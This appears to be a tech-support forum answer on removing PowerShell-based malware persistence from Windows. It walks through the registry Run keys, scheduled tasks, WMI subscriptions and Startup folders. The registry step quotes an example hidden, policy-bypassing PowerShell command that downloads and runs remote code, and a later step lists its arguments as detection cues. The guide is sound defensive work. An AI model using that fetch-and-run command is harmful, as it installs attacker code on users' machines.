![](data:image/svg+xml, %3Csvg xmlns='http://www.w3.org/2000/svg' height='64' class='font-weight-bold' style='font: 600 30.11764705882353px "SegoeUI", Arial' width='64'%3E%3Ccircle fill='hsl(112.00000000000001, 88%, 20%)' cx='32' cy='32' r='32' /%3E%3Ctext x='50%25' y='55%25' dominant-baseline='middle' text-anchor='middle' fill='%23FFF' %3ELA%3C/text%3E%3C/svg%3E)
The behavior is consistent with a malicious script that uses PowerShell for persistence and to contact a remote server. The fix is to remove the persistence points that launch PowerShell and then verify that no malicious PowerShell processes are still running.
A practical cleanup approach (based on a similar resolved case) is:
- Check the Run registry key for malicious PowerShell entries
- Open PowerShell as Administrator.
- List startup entries under the current user:
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run - Look for any value whose data starts PowerShell, for example:
powershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "iex(irm http://...)" - If such an entry exists, delete it (replace the value name with the one found):
reg delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows PowerShell v1.0" /f
- Find what is launching PowerShell
- Still in elevated PowerShell, run:
Get-CimInstance Win32_Process | Where-Object { $_.Name -like "powershell*" } | Select Name,ProcessId,ParentProcessId,CommandLine - If the parent process is a Task Scheduler service (for example
svchost.exe -k netsvcs -s Schedule), PowerShell is being started by a scheduled task.
- Still in elevated PowerShell, run:
- Remove malicious scheduled tasks
- List all tasks and their actions:
Get-ScheduledTask | ForEach-Object { foreach ($a in $_.Actions) { "{0}{1} | {2} {3}" -f $_.TaskPath,$_.TaskName,$a.Execute,$a.Arguments } } - Look for tasks that execute
powershell.exewith suspicious arguments such as-ExecutionPolicy Bypass,-WindowStyle Hidden, oriex(irm http://...). - When a malicious task is identified (example name:
Windows Perflog), remove it:Unregister-ScheduledTask -TaskName "Windows Perflog" -Confirm:$false
- List all tasks and their actions:
- Check for WMI-based persistence
- Some malware uses WMI event subscriptions to relaunch PowerShell. Run:
Get-WmiObject -Namespace root\subscription -Class __EventFilter Get-WmiObject -Namespace root\subscription -Class CommandLineEventConsumer Get-WmiObject -Namespace root\subscription -Class ActiveScriptEventConsumer - Review the output for entries that launch PowerShell or contain suspicious URLs or commands and remove them as appropriate.
- Some malware uses WMI event subscriptions to relaunch PowerShell. Run:
- Check Startup folders
- Inspect these folders for
.ps1,.vbs,.bat, or unknown executables:-
%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup -
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup
-
- Delete any clearly malicious script or shortcut that launches PowerShell.
- Inspect these folders for
- Final verification
- After cleanup, reboot.
- Open PowerShell and verify that only the current PowerShell process is running:
Get-CimInstance Win32_Process | Where-Object { $_.Name -like "powershell*" } | Select Name,CommandLine - PowerShell should no longer open by itself at startup, and no background PowerShell processes with hidden windows or remote URLs should appear.
If PowerShell still launches automatically or new suspicious entries reappear, a full offline scan with Microsoft Defender or a clean reinstall of Windows should be considered to ensure complete removal.
References:
